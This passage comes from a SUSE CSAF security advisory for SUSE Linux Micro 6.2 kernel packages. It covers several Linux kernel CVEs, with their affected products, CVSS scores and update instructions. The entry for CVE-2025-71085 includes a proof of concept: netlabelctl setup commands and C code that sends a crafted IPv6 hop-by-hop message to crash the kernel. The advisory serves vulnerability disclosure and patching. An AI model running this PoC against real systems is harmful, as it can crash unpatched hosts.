"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
